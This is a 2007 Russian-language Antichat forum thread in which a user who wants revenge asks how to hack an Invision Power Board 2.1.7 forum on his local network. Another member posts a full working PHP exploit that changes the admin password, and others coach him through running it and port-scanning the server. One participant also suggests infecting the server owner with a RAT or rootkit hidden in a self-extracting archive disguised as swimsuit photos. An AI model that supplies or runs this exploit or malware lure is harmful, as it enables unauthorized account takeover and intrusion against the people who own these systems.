Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Атака на Ipb + сниффер (https://forum.antichat.xyz/showthread.php?t=53413)

tick 12.11.2007 13:01

Атака на Ipb + сниффер
 
Здравствуйте!
У меня парочка вопросов...

1. Подскажите сниффер для локалки чтобы взломать IPB!?

2. Есть простой способ взлома IPB?

Я не очень соображаю в хакерстве тут...но хочеться поломать форум или же узнать login и password админа в IPB !

it's my 12.11.2007 13:12

хотя бы версию сказал

tick 12.11.2007 13:15

Цитата:

Сообщение от it's my
хотя бы версию сказал

Русская версия Invision Power Board v2.1.7 © 2007 IPS, Inc. :rolleyes:

И последнию! Но главно взломать ту которую выше указал...помогите народ пожалуйста я в этом деле воще мало что знаю...но отомстить я хочу!

it's my 12.11.2007 13:20

может поможет
PHP код:

<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Borard 2.0.0 to 2.1.7
 by Rapigator
 
 This works if:

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on
 
 In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site "http://localhost/forums/index.php";

// An existing user's login name
$name "admin";

// The new password(3-32 characters)
$pass "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix "";
$name urlencode($name);
$pass urlencode($pass);
$curl curl_init($site.'act=Reg&CODE=10');
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'$page$regs)) {
    
$prefix $regs[1];
    
$regid $regs[2];
    
$regcode $regs[3];
} else {
    
$suffix "&debug=1";
    
$curl curl_init($site.'act=Reg&CODE=10'.$suffix);
    
curl_setopt($curlCURLOPT_PROXY$proxy);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_TIMEOUT10);
    
$page curl_exec($curl);
    
curl_close($curl);
    if (
preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'$page$regs)) {
        
$prefix $regs[1];
        
$regid $regs[2];
        
$regcode $regs[3];
    }
}
if (!isset(
$regid) || !isset($regcode)) {
    echo 
"Error: Probably not vulnerable, or no forum found";
    exit;
}

$curl curl_init($site.$suffix);
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'$page$regs)) {
    
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (
preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'$page$regs)) {
    
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function 
change_pass($regcode,$regid,$vid,$userid) {
    global 
$site$proxy$name$pass;
    
$curl curl_init($site.$suffix);
    
curl_setopt($curlCURLOPT_PROXY$proxy);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_POST1);
    
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    
curl_setopt($curlCURLOPT_TIMEOUT10);
    
$page curl_exec($curl);
    
curl_close($curl);
    echo 
"Password Changed!";
    exit;
}
?>

# milw0rm.com [2006-11-01]


tick 12.11.2007 13:28

хм...как я понял это php файл создать и это туда сунуть? Если так т оя сделал поставил VertrigoServ создал php файл твой код вставил запустил пишет "Error: Probably not vulnerable, or no forum found" что там чтонить менять надо в php в коде или тупо вставить?

(извени за тупость если что не так...спасибо что помогаеш)

AkyHa_MaTaTa 12.11.2007 13:48

Как ты понимаеш варианта два:
либо ты не правильно указываешь адрес форума(он у тебя в локалке стоит, а есть ли у вас Dns сервак, если нету надо указать апи форума и путь), либо форум не "болеет" этим багом, что скорее всего, или не выполнется такое условие на серваке:
This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

Менять там нужно только прокси, он по дефолту выключен.

tick 12.11.2007 14:12

нету там dns там из ip типо http://192.168.4.24/forum что мне делать?

it's my 12.11.2007 14:22

а форум из инета виден:

tick 12.11.2007 14:41

нет!
Ну подскажите как можно взломать? Народ ну оч. надо просто хз пожалуйста... :(

it's my 12.11.2007 14:47

почитай может пригодиться:
https://forum.antichat.ru/thread15678.html

а еще измени это:
Цитата:

// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
на это:
Цитата:

// The forum's address up to and including 'index.php'
$site = "http://192.168.4.24/forum/index.php";

AkyHa_MaTaTa 12.11.2007 14:47

В паблике на борду этой версии только это бага, на этом серваке че нибудь еще есть?

tick 12.11.2007 14:58

Акуна матата: Я без понятия....

it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found
Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот:

Index of /forum//ips_kernel/PEAR Name Last modified Size Description

Parent Directory -
Text/ 01-Nov-2007 22:49 -
lgpl.txt 18-Jul-2006 18:56 26K


Apache/2.2.4 (Win32) PHP/5.2.1 Server at 192.168.2.24 Port 80

Папка: Text,lgpl.txt - тут:::

GNU LESSER GENERAL PUBLIC LICENSE
Version 2.1, February 1999

Copyright (C) 1991, 1999 Free Software Foundation, Inc. ну и т.д
в папке text файлы: Diff.php,Diff3.php,lgpl.txt,package.xml там ещё папка Diff в ней Renderer.php и папка Renderer а в ней inline.php и unified.php

т.е. в папки какието могу заходить...это и есть уязвимость? что мне делать подскажи...

it's my 12.11.2007 15:02

Цитата:

Сообщение от tick
Index of /forum//ips_kernel/PEAR Name Last modified Size Description

Parent Directory -
Text/ 01-Nov-2007 22:49 -
lgpl.txt 18-Jul-2006 18:56 26K


Apache/2.2.4 (Win32) PHP/5.2.1 Server at 192.168.2.24 Port 80

это не уязвимсоть, но хорошо что возможно ПО Apache/2.2.4 (Win32) PHP/5.2.1

значит так, ты в нет лезешь через локалку или у тя свой доступ?

tick 12.11.2007 15:04

Локалка там много компов 172.**.**.** и 192.***.**.** и т.д локальная сеть внутрения :)

AkyHa_MaTaTa 12.11.2007 15:12

Как я понял в роли сервака у тебя выступает винда + скорее всего пакет денвера, попробуй втулить телу чья это машина PraRat, или другого руткита.
Ну типа пошли ему адрес с картинками, типа: "зацени это я твоя чикса в купальнике вместе с подружкой", кинь на ftp:(почти в любой локалке есть ftp), и прибацай картинку от Wira SFX.

tick 12.11.2007 15:15

Wira SFX ? извени я же сказал я нуб... :D

AkyHa_MaTaTa 12.11.2007 15:21

Самораспаковыюшийся архив.Ладно этот способ отпадает. Запусти паука(сканер безапасности такой есть),
пускай просканет на наличие открытых портов, может есть какие нибудь шары на той машине. Хотя бы узнай что за винда там крутится.

tick 12.11.2007 15:22

Зделал как _GaLs_ в https://forum.antichat.ru/thread15678.html теме ! Пост #5

Пишет failed что это значит?

tick 12.11.2007 15:24

Цитата:

Сообщение от AkyHa_MaTaTa
Самораспаковыюшийся архив.Ладно этот способ отпадает. Запусти паука(сканер безапасности такой есть),
пускай просканет на наличие открытых портов, может есть какие нибудь шары на той машине. Хотя бы узнай что за винда там крутится.

так и называеться "паук" ? или spider ? где скачать? (можеш не говорить если не знаеш сам найду =)) наверно"! :)

it's my 12.11.2007 15:26

XSpider

AkyHa_MaTaTa 12.11.2007 15:29

Цитата:

Сообщение от tick
Зделал как _GaLs_ в https://forum.antichat.ru/thread15678.html теме ! Пост #5

Пишет failed что это значит?

На том форуме что стоит мод Army System?

Скачать можно, хотя бы здеся:
http://www.softportal.com/freesoftware/1453/xspider

tick 12.11.2007 15:33

TCP порты
- открытые : 10
- закрытые : 2426
- недоступные : 504



- порт 80/tcp
сервер HTTP : Apache/2.2.4 (Win32) PHP/5.2.1 >>>
состояние : 200 (OK)
текущие дата и время : (Mon, 12 Nov 2007 11:30:36 GMT)
формат содержимого : (text/html)
соединение : (close)

определение следующей информации находится пока в тестовом режиме
реальное имя http-сервера совпадает с указанным в его ответе
сервер HTTP : Apache HTTP Server (2.X.X) >>>


Найдено:
- замечаний : 3 >>>

AkyHa_MaTaTa 12.11.2007 15:56

включи проверку всех портов, выключи весь брут, поставь галочку определить ОС.

v1ru$ 12.11.2007 16:19

читай
http://forum.antichat.ru/thread15678.html
http://forum.antichat.ru/threadnav26510-1-10.html
определи версию,как говорится на заборе тоже написано(версия написанная не равна версии форума)
Если удачно заюзаешь сплойт получишь хеш админа,пости его сюда http://forum.antichat.ru/thread46700.html

tick 13.11.2007 06:42

AkyHa_MaTaTa mb xSharez'om проверить?

v1ru$ Да какой это вообще нуб там сидит тупо установвил форум и всё ... даже темы менять не умеет,он наверно безопастность не настраивал даже...ему такое не дано!Уж хз ну в форуме легко всё...

j0nathan 13.11.2007 07:01

Цитата:

Сообщение от tick
Акуна матата: Я без понятия....

it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found
Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот:

Index of /forum//ips_kernel/PEAR

Хотя толку нет но всё равно попробуй в сплойте писать не
http://192.168.2.24/forum/
а без ключа в конце
http://192.168.2.24/forum

[Paran0ik] 13.11.2007 09:34

хех, до этого эта тема не интересовала, но увидел топик, просканил локальный серв :)
версия форума та же, что и у ТС IPB v2.1.7
Цитата:

// The new password(3-32 characters)
$pass = "1234";
как я понял сплойтик меняет пасс админа, т.е. палево, вариант отпадает :)

Имя сервера : Apache/1.3.37 (Unix) PHP/4.4.6
состояние : 200 (OK)
текущие дата и время : ***
формат содержимого : text/html
соединение : Keep-Alive
Информация об имени приложения подтверждена эвристическим методом
Apache HTTP Server (1.3.X)
Версия сервера полученная из файла ошибок : Apache HTTP Server (1.3.37)

тут есть какие-нибудь варианты?
можно как-нибудь применить Список cookie, которые нашел xspider?

tick 13.11.2007 16:08

$proxy="24.48.*.*:**"

Как узнать какие цифры где посмотреть? :(

it's my 13.11.2007 16:44

а зачем тебе прокси? закоментируй строки и всё

tick 13.11.2007 16:53

Цитата:

Сообщение от it's my
а зачем тебе прокси? закоментируй строки и всё

Я сплойт другой нашол какойта там написано $proxy="24.48.*.*:**"; ## - your socks 4/5-proxy
И что заполнять в $cookie="";
я хочу знать что там писать!

it's my 13.11.2007 16:55

купи себе сокс и напиши его

Underwit 13.11.2007 17:08

У вас ничо не выйдет...

AkyHa_MaTaTa 13.11.2007 17:54

Цитата:

Сообщение от tick
Я сплойт другой нашол какойта там написано $proxy="24.48.*.*:**"; ## - your socks 4/5-proxy
И что заполнять в $cookie="";
я хочу знать что там писать!

Че это еще за сплоит, покажи его полность, тогда и напишем что где вставлять.

А вообше:

Underwit: У вас ничо не выйдет...


Время: 00:38